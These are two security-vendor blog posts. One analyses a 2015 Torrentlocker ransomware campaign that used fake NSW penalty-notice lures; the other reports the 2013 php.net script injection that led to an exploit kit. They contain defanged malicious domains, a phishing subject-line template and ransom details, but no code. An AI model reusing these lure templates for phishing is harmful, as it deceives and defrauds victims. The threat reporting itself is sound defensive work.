Ransomware - No Sign of Relief, Especially for Australians
Posted by Carl Leonard on 25 February 2015 01:20 PM
Websense® Security Labs™ researchers observed that ransomware was a plague in 2014 and this threat type shows no sign of relief in 2015. In this blog we profile the user experience for a Torrentlocker variant focusing on the Australian region.
Ransomware is an umbrella name for a type of cybercrime in which the attackers restrict access to a computer until a ransom is paid to restore system access and function. Crypto Ransomware is a form of ransomware in which access to data is blocked by encrypting the data and withholding an encryption key until a ransom is paid to the cyber criminals. (Authors' note: We do not recommend that a ransom is paid to the cyber criminals).
We have seen that Torrentlocker rotates through many themes/lures/targets and tends to be low volume and targeted.
In the latter half of 2014 we observed fake Royal Mail lures (targeting UK end-users) and Australia Post lures, but then Torrentlocker moved on to Turkish-themed lures (Turk Telekom, TTNET) and then New South Wales Government lures, of which we see a repeat in our current case study. There have also been Czech Post lures, TESA Telecom (Brazilian-themed) lures, Italian lures and others too. The lure tend to be fake ‘eFax’ or ‘penalty’ download pages.
Our case study, the Australian-themed ransomware, exhibits the typical process from lure to infection.
Ransomware is most often distributed via email lures or compromised websites (specifically malvertising). Today's case study used an initial email lure with a topic of penalties induced by speed cameras. A typical subject is "Penalty id number - <random number> / Fixed by speed camera".
The lure email contains a URL (in this case a compromised wordpress host). The end user is sent through to a website that makes a call to action:
In this case we see a Penalty Notice claiming to be from the New South Wales Office Of State Revenue. For the avoidance of doubt the OSR is a legitimate organization and their website is hosted at http://www.osr.nsw.gov.au/. Social Engineering is needed to convince the end user to perform an action. Note the use of a legitimate-looking logo as well as a CAPTCHA entry form to add a degree of legitimacy on the fraudulent website, and to encourage a further click action. Hosts of the fraudalent website rotate, but include hxxp://nsw.gov.yourpenalty.com/ and hxxp://osr.nsw.mypenalty.org/ Similar variants on the theme will likely occur in the future.
Once the end user has been duped into clicking through, they are presented with a warning notice:
Decrypt instructions are provided via an HTML document installed on the user's machine. This points the user to yet another website where they are encouraged to perform a transaction:
As is typical, the decrypter service website offers two prices for decryption. If the end user pays promptly they have to pay 2.4 bitcoins, (approximately) 499 USD. If they pay after 3 days they would have to pay approximately 998 USD.
A timer is shown to encourage urgent action. The malicious website also reveals the number of files that have been encrypted. Instructions are provided if the user is unsure how to trade in Bitcoins.
As before, we do not recommend paying the cyber-criminals to decrypt the files. Success is not guaranteed. If you fear you may have encountered a ransomware website (at any stage of the threat lifecycle) you can check our view on that by submitting the site to our online CyberSecurity Intelligence website analysis tool at http://csi.websense.com/
This variant of Torrentlocker cycles through hosts with various country code Top Level Domains (ccTLDs). We observed .com, .at (Austria), .lt (Lithuania) and .ru (Russia). Variants included:
As mentioned above the fraudalent OSR-themed websites also change frequently to make detection difficult without real-time detection technologies.
The Financial Services sector was the one most targeted by this particular campaign.
Protecting from Ransomware
Websense customers were protected at the time of this Australian-themed ransomware attack via real-time analytics within ACE, our Advanced Classification Engine. Protection is offered at the different stages of the attack detailed below:
Our File Sandboxing tool classifies the ransomware payload as Malicious in the report here.
At the time of writing (25 February 2015) the file sample has a detection rate of only 3 out of 57 anti-virus vendors in VirusTotal.
Ransomware will continue to evolve as we progress through to 2015. Once a machine has become infected and files encrypted there is a little that an end user can do to counter it. To strengthen your overall security posture we recommend that you raise awareness within your employee base of the dangers and signs of ransomware, and adopt suitable technologies to identify and protect from the threat in the early stages of the threat lifecycle.
Blog Contributors: Mark Haffenden, Nicholas Griffin, Carl Leonard.
Read more »
PHP.net compromised, serving up obfuscated content
Posted by Drendell_ on 25 October 2013 01:21 PM
The Websense® ThreatSeeker® Intelligence Cloud has alerted us regarding content deployed on the web developer's web site hxxp://php.net/.
Internet users may know that Google Safe Browsing has also alerted users to a possible infection or compromise of php.net, a site currently ranked 220 on the Alexa ranking system. A member of Google's staff has posted on a number of forums (examples here and here) to confirm that this is, in fact, a true positive, as confirmed by our telemetry. Members of the same forums quickly compared versions of the script, identifying the following code as appended to at least 4 .js scripts within the hxxp://php.net/ domain:
The following screen shot shows the decoded obfuscation:
The iFrame source was hosted on a VPS owned by hxxp://webfusion.co.uk/, which should be applauded for swiftly taking the site down, soon after this compromise came to light. Before the takedown, the URL returned one of two types of content: a basic plugin detection script, or the simple string "not ready", as shown below:
The code was served just once per IP and was dependent upon correct Referer and UA strings.
The ultimate goal of this injection was to redirect users to the Magnitude Exploit Kit (MEK), which attempts to exploit Adobe and Java platforms, among others, in order to serve up generic Ransomware.
Websense customers were, as always, protected against this type of attack by ACE™, our Advanced Classification Engine.
Of the 7 Stages of Advanced Threats, Websense offered protection at the following stages:
Update (at the time of this blog posting): The malicious code has been removed from hxxp://php.net/.
Read more »